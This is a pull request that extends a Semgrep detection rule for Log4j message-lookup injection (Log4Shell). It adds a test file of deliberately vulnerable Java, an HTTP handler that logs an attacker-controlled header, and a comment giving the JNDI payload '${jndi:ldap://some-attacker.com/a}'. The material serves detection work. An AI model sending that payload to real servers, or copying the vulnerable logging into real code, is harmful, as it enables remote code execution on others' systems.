### PR TITLE
Add pattern for a popular log4j package import

### DIFF
--- a/java/log4j/security/log4j-message-lookup-injection-lunasec.java
+++ b/java/log4j/security/log4j-message-lookup-injection-lunasec.java
@@ -1,0 +1,33 @@
+// Source: https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code
+// Copyright © LunaSec
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+import java.io.*;
+import java.sql.SQLException;
+import java.util.*;
+
+public class VulnerableLog4jExampleHandler implements HttpHandler {
+
+  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
+
+  /**
+   * A simple HTTP endpoint that reads the request's x-api-version header and logs it back.
+   * This is pseudo-code to explain the vulnerability, and not a full example.
+   * @param he HTTP Request Object
+   */
+  public void handle(HttpExchange he) throws IOException {
+    String apiVersion = he.getRequestHeader("X-Api-Version");
+
+    // This line triggers the RCE by logging the attacker-controlled HTTP header.
+    // The attacker can set their X-Api-Version header to: ${jndi:ldap://some-attacker.com/a}
+    // ruleid: log4j-message-lookup-injection
+    log.info("Requested Api Version:{}", apiVersion);
+
+    String response = "<h1>Hello from: " + apiVersion + "!</h1>";
+    he.sendResponseHeaders(200, response.length());
+    OutputStream os = he.getResponseBody();
+    os.write(response.getBytes());
+    os.close();
+  }
+}

--- a/java/log4j/security/log4j-message-lookup-injection.yaml
+++ b/java/log4j/security/log4j-message-lookup-injection.yaml
@@ -28,9 +28,11 @@ rules:
   - patterns:
     - pattern: public $T $M(...)   # audit rule until it can checked < 2.15.0
   pattern-sinks:
-  - patterns:
+  - pattern-either:
     - pattern: |
         (org.apache.log4j.Logger $L).$M(...)
+    - pattern: |
+        (org.apache.logging.log4j.Logger $L).$M(...)
   severity: WARNING
   languages:
   - java


### PR DESCRIPTION
Hey,

I noticed that semgrep doesn't detect the code example from [Lunasec's original article](https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code) and I decided to add another pattern for the `org.apache.logging.log4j` package. This import name seems to be [pretty popular on github](https://github.com/search?q=lang%3AJava+%22import+org.apache.logging.log4j%22&type=code).

I haven't found a best practice in the docs for the case when two test files are needed for a single rule, so I'm not sure if I named the test file properly. Let me know if I did it in the wrong way.

While I understand that the current rule is not perfect and prone to false-positives, I hope this PR is still going to be useful for someone.

Cheers.